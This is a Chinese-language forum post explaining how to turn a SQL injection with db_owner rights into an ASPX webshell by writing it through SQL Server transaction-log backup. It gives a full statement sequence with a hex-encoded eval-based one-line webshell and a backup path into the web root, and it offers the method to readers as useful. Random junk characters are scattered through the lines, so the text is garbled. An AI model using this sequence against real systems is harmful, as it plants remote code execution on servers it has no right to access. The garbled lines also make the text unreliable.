最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
) j6 @2 U7 m/ ~2 G" ^ o5 U1 Z但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。# H+ m! D: a5 O$ z9 l# y7 Y# [
经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。% g' P. K$ u4 s: |6 i
经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。# `2 `* r# m" J, @2 b
]3 G6 D* l, t1 H7 a--------------------------------------------------------------
( w# ~8 J0 B6 ~$ n( ~5 K( p" A今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,5 F& R( S0 H! u4 U$ [
自己修改备份语句如下:& ~* Y+ g) }1 h1 t7 x* i
Drop table cmd;--
9 Z$ D) {" X( a4 @% talter database db_test set RECOVERY FULL;--
. G& D9 G5 j4 m( x+ k, t0 _1 `create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段
! x% T C2 t7 i4 g3 |backup log db_test to disk = 'c:\bak' with init;--
4 g1 x6 ?' ^% X7 J; @insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--
- |" \" v- J/ @# pdelete from cmd where id>1;--删除id>1的数据
+ T# k p7 a7 V2 |/ w% Q5 bbackup log db_test to disk = 'e:\webroot\test.aspx';-- J& O9 s2 Z, N! q7 U6 z
Drop table cmd;--
' V+ x, W( T. c2 M希望对大家有用。 |